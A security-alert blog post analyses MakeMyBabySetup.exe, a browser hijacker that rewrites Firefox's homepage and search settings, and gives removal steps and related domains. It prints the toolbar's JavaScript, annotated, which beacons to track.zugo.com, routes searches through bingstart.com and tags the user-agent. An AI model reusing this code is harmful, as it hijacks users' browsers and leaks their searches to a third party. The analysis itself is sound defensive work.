MakeMyBabySetup.exe [SECURITY ALERT]
Today I came into work and found that a couple of the browsers on a workstation had been modified. After searching through the browser history, I found that the file MakeMyBabySetup.exe had been downloaded and executed.
This file is an installer script that modifies your browser's start page and changes the default search to Bing. After analyzing the files within MakeMyBabySetup.exe, it appears that searches go to the non-Bing site BingStart.com, which then redirects to the actual Bing.com site. It also installs a fake Bing toolbar within Firefox. This provides your search criteria and current URL to a third party. It also allows the third party to redirect you to any site they like.
Recommendation:
Delete MakeMyBabySetup.exe
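Uninstall the toolbar and remove Bing as the search provider if it has already been installed. Afterwards, check in about:config that browser.startup.homepage, keyword.URL and general.useragent.extra.searchtoolbar no longer carry the values set by the script listed below.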
Avoid the following sites (They share the same IP as BingStart.com):
www.vlcsearch.com
chameleonsearch.net
www.searchz.org
whitesmokestart.com
free-search.net
www27.yoog.com
forexstart.net
deverevenues.zugo.com
flvdirect.iamwired.net
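Other details (JavaScript from the Firefox toolbar; the blog formatting has replaced the straight quotes with typographic ones and cut off the loop header in searchtoolbar_uri, so the listing will not run as pasted):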
// Entry point: run init() when the window's load event fires (third argument false = no capture).
window.addEventListener(“load”, init, false);
/**
 * Debug helper: writes str to the FUEL application console and then opens the console.
 * No other function in this listing calls it.
 */
function log(str) {
Application.console.log(str);
Application.console.open();
}
/**
 * Load handler. In order: sends a tracking request if the toolbar is visible, applies the
 * homepage/search changes when the "installed" pref is not "1", sets the user-agent pref,
 * and registers listeners that revert some settings when the extension is uninstalled.
 */
function init() {
// Track if toolbar visible
var tlb = document.getElementById(“searchtoolbar-toolbar”);
// NOTE(review): tlb is dereferenced without a null check, so a missing toolbar element would throw here.
if (!tlb.collapsed) track();
// Apply default settings
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
// The pref defaults to "0", so applySettings() runs on the first load after install and
// again on the first load after restoreSettings() has reset the pref to "0".
if (app.prefs.getValue(“extensions.searchtoolbar.installed”, “0″)!=”1″) applySettings();
// Runs on every load, not only on first run.
setUserAgent();
// Handle uninstall
var ext = Application.extensions.get(“searchtoolbar@zugo.com”);
var listener = {
// NOTE(review): the uninstall and ext fields are never read anywhere in this listing.
uninstall: false,
ext: ext,
handleEvent: function(aEventItem) {
switch (aEventItem.type) {
case ‘uninstall’:
// Revert homepage/search prefs when the user schedules the extension for removal.
restoreSettings();
return;
case ‘unload’:
// Detach the listeners when the application unloads.
ext.events.removeListener(‘uninstall’, this);
Application.events.removeListener(‘unload’, this);
return;
}
}
};
ext.events.addListener(‘uninstall’, listener);
// NOTE(review): 'cancel' is registered but handleEvent has no case for it and it is never removed.
// Because restoreSettings() sets the "installed" pref back to "0", a cancelled uninstall
// would lead to applySettings() running again on the next load.
ext.events.addListener(‘cancel’, listener);
Application.events.addListener(‘unload’, listener);
}
/**
 * Sends an asynchronous GET to the registerImp.py endpoint on track.zugo.com over plain HTTP.
 * No response handler is attached, so the reply is ignored. init() calls this whenever the
 * toolbar is not collapsed.
 * Defender note: requests to this host and path are a network indicator that the toolbar is loaded.
 */
function track() {
var req = Components.classes["@mozilla.org/xmlextras/xmlhttprequest;1"].createInstance(Components.interfaces.nsIXMLHttpRequest);
// Third argument true = asynchronous request.
req.open(‘GET’, ‘http://track.zugo.com/cgi-bin/registerImp.py?type=churn&loc=toolbar’, true);
req.send(null);
}
/**
 * First-run routine: marks the toolbar as installed, registers the bundled search engine,
 * and, depending on extensions.searchtoolbar.* flags, rewrites the homepage, the default
 * search engine name and keyword.URL to point at bingstart.com, then opens one or two pages.
 * Only the previous homepage is saved; the previous keyword.URL and default engine name are not.
 */
function applySettings() {
// Remember that toolbar installed
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
app.prefs.setValue(“extensions.searchtoolbar.installed”, “1″);
// Add Bing search
var search = Components.classes["@mozilla.org/browser/search-service;1"].getService(Components.interfaces.nsIBrowserSearchService);
// Engine definition is loaded from the extension's own chrome package (bing-zugo.xml).
// NOTE(review): the trailing false appears to be addEngine's confirm flag, i.e. no user prompt - confirm against the API docs.
if (search) search.addEngine(“chrome://searchtoolbar/content/bing-zugo.xml”, 1, “”, false);
// Set homepage
if (app.prefs.getValue(“extensions.searchtoolbar.startpage”, false)) {
// Save the user's current homepage so restoreSettings() can put it back.
app.prefs.setValue(“extensions.searchtoolbar.oldhomepage”, app.prefs.getValue(“browser.startup.homepage”, “”));
app.prefs.setValue(“browser.startup.homepage”, “http://www.bingstart.com/”);
}
// Set search
if (app.prefs.getValue(“extensions.searchtoolbar.defaultsearch”, false)) {
app.prefs.setValue(“browser.search.defaultenginename”, “Bing”);
// keyword.URL is overwritten with a bingstart.com URL over plain HTTP; the old value is not kept.
app.prefs.setValue(“keyword.URL”, “http://www.bingstart.com/s/?src=FF-Address&site=$SearchProvider&q=”);
}
// Open install url
if (app.prefs.getValue(“extensions.searchtoolbar.installregister”, false)) {
var win = window.open(“http://www.bingstart.com/”, “”);
win.focus();
}
// Open optional url
// The URL is taken verbatim from a preference, so whatever wrote that pref (presumably the
// installer - not shown here) decides which page opens.
var firstrunURL = app.prefs.getValue(“extensions.searchtoolbar.firstrunURL”, “”);
if (firstrunURL!=”") {
var win = window.open(firstrunURL, “”);
win.focus();
}
}
/**
 * Copies the value of pref.searchtoolbar.navid, when non-empty, into
 * general.useragent.extra.searchtoolbar. Called from init() on every load.
 * NOTE(review): in Firefox versions that honour general.useragent.extra.* prefs this value is
 * appended to the User-Agent header, which would expose the identifier to every site visited - confirm
 * for the affected browser version. restoreSettings() does not clear this pref.
 */
function setUserAgent() {
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
// Note the different pref branch ("pref." rather than "extensions.") used for the source value.
var navid = app.prefs.getValue(“pref.searchtoolbar.navid”, “”);
if (navid!=”") app.prefs.setValue(“general.useragent.extra.searchtoolbar”, navid);
}
/**
 * Uninstall handler: resets the "installed" flag to "0", restores the homepage saved by
 * applySettings() (or "" when none was saved), and blanks keyword.URL and the default
 * engine name instead of restoring the user's earlier values.
 * Remediation note: the search engine added by applySettings() and the
 * general.useragent.extra.searchtoolbar pref are not touched here, so they need manual cleanup.
 */
function restoreSettings() {
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
app.prefs.setValue(“extensions.searchtoolbar.installed”, “0″);
app.prefs.setValue(“browser.startup.homepage”, app.prefs.getValue(“extensions.searchtoolbar.oldhomepage”, “”));
// The previous values were never saved, so these are set to empty strings.
app.prefs.setValue(“keyword.URL”, “”);
app.prefs.setValue(“browser.search.defaultenginename”, “”);
}
/**
 * Selects the search type for the toolbar button: swaps the button image to
 * drop_<type>.png and stores type in the button's searchType attribute.
 * The event parameter is not used.
 */
function searchtoolbar_search_setup(event, type) {
var btn = document.getElementById(“bing-combined-button”);
btn.setAttribute(“image”, “chrome://searchtoolbar/skin/drop_”+type+”.png”);
btn.setAttribute(“searchType”, type);
}
/**
 * Runs a toolbar search: reads the selected type from the button (falling back to
 * defaultType), encodes the search box text, and navigates the content window to
 * bingstart.com/s/ with the query, engine and site parameters.
 * The query is sent to bingstart.com over plain HTTP rather than to bing.com directly.
 * The event parameter is not used.
 */
function searchtoolbar_search(event, defaultType) {
var btn = document.getElementById(“bing-combined-button”);
var type = btn.getAttribute(“searchType”);
if (!type) type = defaultType;
var searchBox = document.getElementById(“bing-search-box”);
var searchTerms = searchtoolbar_uri(searchtoolbar_trim(searchBox.value));
// type is concatenated into the URL without encoding; only the search terms are encoded.
searchtoolbar_navigate(“http://www.bingstart.com/s/?q=”+searchTerms+”&engine=”+type+”&site=Bing”);
}
/**
 * Normalises whitespace in str: strips leading and trailing whitespace and collapses each
 * internal run of whitespace to a single space. Returns an empty string for a falsy input.
 */
function searchtoolbar_trim(str) {
if (!str) return “”;
// Leading whitespace, then trailing whitespace, then internal runs.
str = str.replace(/^\s+/, ”);
str = str.replace(/\s+$/, ”);
str = str.replace(/\s+/g, ‘ ‘);
return str;
}
/**
 * Splits str on spaces and appends encodeURIComponent() of each term to the result string.
 * NOTE(review): the loop header below is cut off in this listing (probably the "<" was
 * swallowed as HTML), so the loop bounds and any separator inserted between terms cannot
 * be determined from what is shown.
 */
function searchtoolbar_uri(str) {
var result = “”;
// The new Array() is immediately replaced by the result of split().
var termArray = new Array();
termArray = str.split(” “);
// Truncated in the source page: the remainder of the for(...) header is missing.
for(var i=0; i
result += encodeURIComponent(termArray[i]);
}
return result;
}
/**
 * Loads url, after processUrl() has added the toolbar parameters, in the current content
 * document and then gives focus to the content window.
 */
function searchtoolbar_navigate(url) {
// Uses window._content for the navigation and window.content for the focus call.
window._content.document.location = processUrl(url);
window.content.focus();
}
/**
 * Decorates an outgoing URL: appends src=FF-Toolbar, appends the cfg pref when set, and
 * replaces the leading "http://www." with "http://<subdomain>." when the subdomain pref is set.
 * Returns the modified URL.
 * Defender note: because the host prefix is pref-controlled, traffic may go to a bingstart.com
 * subdomain other than www, so filtering should match the whole domain, not only the www host.
 */
function processUrl(url) {
// "?" is used only when the URL has no "?" and ends with "/"; every other URL gets "&",
// including one with no query string that does not end in "/".
url += (url.indexOf(“?”)==-1 && url[url.length-1]==”/”) ? “?” : “&”;
url += “src=FF-Toolbar”;
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
// cfg is appended as-is, without URL encoding.
var cfg = app.prefs.getValue(“extensions.searchtoolbar.cfg”, “”);
if (cfg!=”") url += “&cfg=”+cfg;
var subdomain = app.prefs.getValue(“extensions.searchtoolbar.subdomain”, “”);
// String-pattern replace: only the first occurrence of "http://www." is rewritten.
if (subdomain!=”") url = url.replace(“http://www.”, “http://”+subdomain+”.”);
return url;
}
/**
 * Key handler for the search box: pressing Return starts a search with the default type 'web'.
 */
function searchtoolbar_key(event) {
if(event.keyCode == event.DOM_VK_RETURN) searchtoolbar_search(event, ‘web’);
}
/**
 * Reads and encodes the current search box text but does nothing with the result;
 * as shown, this is a stub with no network or UI effect.
 */
function searchtoolbar_suggest() {
var searchBox = document.getElementById(“bing-search-box”);
// Computed and then discarded.
var searchTerms = searchtoolbar_uri(searchtoolbar_trim(searchBox.value));
}
